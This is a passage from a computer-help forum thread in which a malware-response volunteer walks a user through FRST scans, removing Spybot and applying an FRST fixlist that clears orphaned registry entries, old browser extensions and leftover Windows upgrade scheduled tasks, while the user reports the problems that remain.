
When completed run the Farbar tool and post both logs for my review.

Do not run the Tweaking tool just yet.

#9 Gregbc1976

Gregbc1976
  • Topic Starter

  • Members
  • 19 posts
  • OFFLINE
  •  
  • Local time:01:34 AM

Posted 11 August 2016 - 08:42 AM

Ran vssfixx64 it completed without any messages or logs that I could determine

 

Ran FRST forgot to run as admin it created a fixlog.txt see attached. I did not run a scan.

 

Ran FRST again and scanned  as administrator see attached FRST.txt

 

Attached File  Fixlog.txt   13.89KB   1 downloads

 

Attached File  FRST.txt   43.68KB   1 downloads



#10 nasdaq

nasdaq

  • Malware Response Team
  • 38,936 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:01:34 AM

Posted 11 August 2016 - 10:08 AM

Please run the Farbar tool one more time.
Ensure that the Box to create an Addition.txt file is checked.

Paste the fresh Addition.txt file for my review.

#11 Gregbc1976

Gregbc1976
  • Topic Starter

  • Members
  • 19 posts
  • OFFLINE
  •  
  • Local time:01:34 AM

Posted 11 August 2016 - 01:04 PM

Once again thanks for your help

see attached files (I also included the fresh FRST.txt)

 

Attached File  FRST.txt   43.08KB   1 downloads

 

Attached File  Addition.txt   54.52KB   1 downloads



#12 nasdaq

nasdaq

  • Malware Response Team
  • 38,936 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:01:34 AM

Posted 12 August 2016 - 08:01 AM

Before you proceed with this fix delete the current Fixlist.txt that you previously created.

Spybot and Destroy may be protecting the registry.
Therefor I strongly suggest you remove it via the Control Panel > Programs > Programs and Features.

Restart the computer to reset the registry.

===


Press the windows key Windows_Logo_key.gif+ r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and and click the OK key.
Please copy the entire contents of the code box below to the a new file.
 
start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

HKLM-x32\...\Run: [] => [X]
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
GroupPolicyScripts-x32: Restriction <======= ATTENTION
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll => No File
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\avg-secure-search.xml [2014-08-26]
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0023-ABCDEFFEDCBA} [2011-01-24] [not signed]
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} [2012-06-14] [not signed]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2016-06-10]
CHR HKLM-x32\...\Chrome\Extension: [jfmjfhklogoienhpfnppmbcbjfjnkonk] - <no Path/update_url>
U3 idsvc; no ImagePath
U3 wpcsvc; no ImagePath
C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0023-ABCDEFFEDCBA}
C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA}
Task: {2CD25754-13AA-4775-B30F-F0607745C1F6} - \Microsoft\Windows\Setup\GWXTriggers\Logon-URT -> No File <==== ATTENTION
Task: {51C1E536-747F-4B34-840F-D0914E0355F5} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {5B16E285-B289-421B-99E7-A12B163EE510} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {5D3F78A7-82CA-4FAD-90E0-89D7AC31A69C} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {6A7B26ED-20DF-4D37-B1DD-5BE116E84B90} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {76A4380F-3D18-49F7-91FA-E28BA06D8AE8} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {928CFA40-274E-4744-AE9D-B6368CD25CFF} - \Microsoft\Windows Defender\MP Scheduled Scan -> No File <==== ATTENTION
Task: {D1D0EB61-0014-47B5-8382-2F0E44CF7A8E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {D1E3F3E1-731E-45E4-86AD-ABAF3DAAA5F9} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {E499F8F0-A04A-47B8-8BAC-E498442C0399} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {E94FE054-1715-4313-8BF0-E7CD02F28C77} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {EF109252-8D17-40B7-9D01-75B7341DA22A} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> No File <==== ATTENTION
Task: {F3502C3B-DF07-4A3F-A123-D2D20CF4E814} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> No File <==== ATTENTION
Task: {F76C1D00-C776-4D7F-9828-7B4ADC39D3EB} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

Restart the computer normally to reset the registry.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

Not sure if your Restore points has been repaired.
The Addition.txt file reports that the last one was on
09-08-2016 12:19:50 Windows Update

I will keep an eye on the Fixlog.txt file that will be created with this fix.
It should indicate if a restore point was created or not.

Run this filx and let me know what problem persists.

#13 Gregbc1976

Gregbc1976
  • Topic Starter

  • Members
  • 19 posts
  • OFFLINE
  •  
  • Local time:01:34 AM

Posted 12 August 2016 - 08:42 AM

Removed Spybot, rebooted. 

Ran FRST Fix it automatically rebooted.

 

Microphone is still OK

 

Start (left button click)  and WIndows key do not respond (shows the little blue circle as if program is loading/running) then nothing

EDGE icon still missing 

IE seems to be performing much better after initial page that gives "a long running script" error

 

Attached File  Fixlog.txt   11.98KB   1 downloads

 

 



#14 nasdaq

nasdaq

  • Malware Response Team
  • 38,936 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:01:34 AM

Posted 12 August 2016 - 10:29 AM

The good news is that a restore point was creared.

Try to run the Tweaking tool script now that Spybot has been removed.

post the log is you are successful.

#15 Gregbc1976

Gregbc1976
  • Topic Starter

  • Members
  • 19 posts
  • OFFLINE
  •  
  • Local time:01:34 AM

Posted 12 August 2016 - 01:32 PM

Step 5 had an error see attached word document

Also attaching log files from the attempted backup

 

Attached File  Tweaking Error 8-12-16.doc   27.5KB   3 downloads

 

Attached File  backup_info.txt   216bytes   1 downloads

 

Attached File  Log_Backup.txt   27.93KB   1 downloads

 

Attached File  sddl.txt   10.77KB   2 downloads

 

I did NOT run the Repair step yet

 

 






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users